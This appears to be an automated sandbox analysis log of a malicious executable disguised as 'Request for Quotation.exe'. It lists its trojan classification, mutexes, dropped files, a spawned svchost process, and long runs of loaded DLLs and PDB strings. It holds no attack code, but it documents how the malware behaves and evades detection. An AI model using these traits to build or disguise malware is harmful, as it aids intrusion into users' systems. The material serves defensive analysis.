          Source: Spectrum.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: ssh-agent.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.0.dr | Binary string: list<T> too long%user_Pictures%%user_RoamingAppData%%user_Favorites%%user_Music%%user_Desktop%%user_Contacts%%user_SkyDriveDocuments%%user_Videos%%user_SkyDrivePictures%%user_Programs%%user_PrintHood%%user_Cookies%%user_UserProgramFilesCommon%%user_SkyDrive%%user_Startup%%user_NetHood%%user_CDBurning%%user_InternetCache%%user_Downloads%%user_UserProgramFiles%%user_History%%user_Documents%%user_Recent%%user_AdminTools%%user_Templates%%user_Temp%%user_Profile%%user_LocalAppData%%user_StartMenu%%user_SentTo%%common_music%%program_filescommon%%common_programs%%systemdrive%%systemwow64%%system_public%%common_templates%%program_filesx86%%common_startmenu%%common_desktop%%common_pictures%%common_startup%%common_admin_tools%%CDIDLResources%%program_files%%common_documents%%common_video%%system_common%%programdata%\??\UNC\localhost\Admin$\Device\Mup\0:0:0:0:0:0:0:1\\Device\Mup\;LanmanRedirector\;\??\UNC\0:0:0:0:0:0:0:1\Admin$\??\UNC\127.0.0.1\Admin$\??\UNC\localhost\\\0:0:0:0:0:0:0:1\\\::1\\\?\\Device\Mup\localhost\Admin$\\\??\UNC\0:0:0:0:0:0:0:1\\Device\Mup\::1\Admin$\??\\??\UNC\::1\\\127.0.0.1\\Device\Mup\0:0:0:0:0:0:0:1\Admin$\Device\Mup\DfsClient\;\??\UNC\::1\Admin$\??\UNC\127.0.0.1\\Device\Mup\localhost\\Device\Mup\127.0.0.1\\SystemRoot\Device\Mup\::1\\Device\Mup\127.0.0.1\Admin$\\localhost\
Source: MsSense.exe.0.dr | Binary string: ?\??\UNC\\Device\Mup\\?\UNC\\Device\Mup\AcquireOplockOperationSuccessCounterHashCalculationSuccessCounter[[:xdigit:]]{64}[[:xdigit:]]{32}[[:xdigit:]]{40}_%temp%%fonts%\\.\pipe\\Admin$localhostMicrosoft.muiStatisticsWilError_03%windows%%system_AllUsersProfileRoot%%system%bad allocationbad array new lengthSHELL32.dllole32.dll"
Source: MsSense.exe.0.dr | Binary string: bad cast.\\tsclient\??\UNC\tsclient\\?\UNC\tsclient\Device\Mup\tsclientFailed to expand environment strings in pathFailed to expand environment strings in path after increasing buffer size\temp\systemGetAllUsersProfileDirectory failedSeSecurityPrivilegeSeRestorePrivilegeamcore\wcd\source\common\src\pathutils.cppFailed to get SACL from security descriptorNo SACL exist in the security descriptorGetModuleFileName failedCurrent machine is not downlevel server, So returning current execution path location itselfGetCurrentLibraryLocation() returned %ProgramFiles%_wsplitpath_s failed_wmakepath_s failedinvalid string positioninvalid hash bucket countSetting privilegeFailed to get process tokenFailed to lookup for privilege valueFailed to adjust token privilegesFailed to assign privilegesPrivilege was enabled before and not changedInvalid Argument Location passedSeTakeOwnershipPrivilegeFailed to set SE_TAKE_OWNERSHIP_NAME privilegeFailed to set SE_SECURITY_NAME privilegeSetting ACL on folderFailed to convert security descriptor from SDDL stringFailed to get Owner from security descriptorNo Owner info exist in the security descriptorFailed to get group sid from security descriptorNo group sid exist in the security descriptorFailed to get DACL from security descriptorNo DACL exist in the security descriptorFailed to set ACL on the folderSetting ACL on folder successfulFile path exceeds MAX_PATHCould not read the fixed file infovector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigitFailed to get registry value size. Return default valueCould not open or create the registry path. Return default valueWrite registry valueFailed to set registry keyFailed to read registry value. Return default valueRegistry value is empty or bigger than max length. Return default valueCould not open the registry keySeBackupPrivilegeDelete registry valueFailed to delete registry valueCould not create a UNICODE_STRING to hold valueNameNew registry key was createdCould not open or create the registry keyCould not acquire or SE_RESTORE_NAME privilegeCould not acquire or SE_BACKUP_NAME privilegeCreated a new key where one should have existedCould not delete the registry keyCould not re-open the registry keyNULL%windir%\System32\wevtutil.exeCurrent machine is not downlevel server, So updatability procedure won't be appliedPerforming the version update completion activityUpdate process failedRemoving the Next Version registry keyFailed to add acl on installation pathFailed to mark as bad versionVersion update failed, so marking the version as badFailed to remove NextVersion registrySetting sense switch status registry key;Version is already marked as invalidMarking version as invalidFailed to set switch status registryChecking IsVersionUpdateInProgressCurrent machine is not downlevel server, so updatability procedure won't applyFailed to add version to Bad Version ListB{
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@17/28@5/2
Source: C:\Windows\SysWOW64\perfhost.exe | Code function: 14_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,14_2_0078CBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\Request for Quotation.exe | File created: C:\Users\user\AppData\Roaming\398ce0ec3b45a4be.bin
Source: C:\Windows\System32\AppVClient.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-398ce0ec3b45a4be9ea72c54-b
Source: C:\Users\user\Desktop\Request for Quotation.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-398ce0ec3b45a4be-inf
Source: C:\Users\user\Desktop\Request for Quotation.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-398ce0ec3b45a4be7d8e3ee9-b
Source: C:\Users\user\Desktop\Request for Quotation.exe | File created: C:\Users\user\AppData\Local\Temp\aut4FCF.tmp
Source: C:\Users\user\Desktop\Request for Quotation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Request for Quotation.exe | ReversingLabs: Detection: 81%
Source: unknown | Process created: C:\Users\user\Desktop\Request for Quotation.exe "C:\Users\user\Desktop\Request for Quotation.exe"
Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown | Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown | Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown | Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: C:\Users\user\Desktop\Request for Quotation.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Request for Quotation.exe"
Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Request for Quotation.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe | Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe | Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: spectrumsyncclient.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: perceptionsimulationextensions.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: hid.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: holographicruntimes.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: perceptiondevice.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: spatialstore.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: esent.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: analogcommonproxystub.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: structuredquery.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: icu.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: mswb7.dll
Source: C:\Windows\System32\Spectrum.exe | Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
Source: Request for Quotation.exe | Static file information: File size 1795584 > 1048576
Source: Request for Quotation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Request for Quotation.exe, 00000000.00000003.1706837407.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: msiexec.pdb source: msiexec.exe.0.dr
          Source: Binary string: SensorDataService.pdb source: SensorDataService.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: SensorDataService.pdbGCTL source: SensorDataService.exe.0.dr
          Source: Binary string: PerfHost.pdb source: perfhost.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: ssh-agent.pdb source: ssh-agent.exe.0.dr
          Source: Binary string: msiexec.pdbGCTL source: msiexec.exe.0.dr
          Source: Binary string: PresentationFontCache.pdb source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: maintenanceservice.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdb source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: Spectrum.pdb source: Spectrum.exe.0.dr
          Source: Binary string: MsSense.pdbGCTL source: MsSense.exe.0.dr
          Source: Binary string: MsSense.pdb source: MsSense.exe.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.0.dr
          Source: Binary string: locator.pdb source: Locator.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: locator.pdbGCTL source: Locator.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: ssh-agent.pdbX source: ssh-agent.exe.0.dr
          Source: Binary string: snmptrap.pdb source: snmptrap.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: snmptrap.pdbGCTL source: snmptrap.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdbGCTL source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: maintenanceservice.exe.0.dr
          Source: Binary string: PerfHost.pdbGCTL source: perfhost.exe.0.dr
          Source: msiexec.exe.0.dr Static PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
          Source: elevation_service.exe.0.dr Static PE information: section name: .00cfg
          Source: elevation_service.exe.0.dr Static PE information: section name: .gxfg
          Source: elevation_service.exe.0.dr Static PE information: section name: .retplne
          Source: elevation_service.exe.0.dr Static PE information: section name: _RDATA
          Source: elevation_service.exe.0.dr Static PE information: section name: malloc_h
          Source: maintenanceservice.exe.0.dr Static PE information: section name: .00cfg
          Source: maintenanceservice.exe.0.dr Static PE information: section name: .voltbl
          Source: maintenanceservice.exe.0.dr Static PE information: section name: _RDATA
          Source: msdtc.exe.0.dr Static PE information: section name: .didat
          Source: msiexec.exe.0.dr Static PE information: section name: .didat
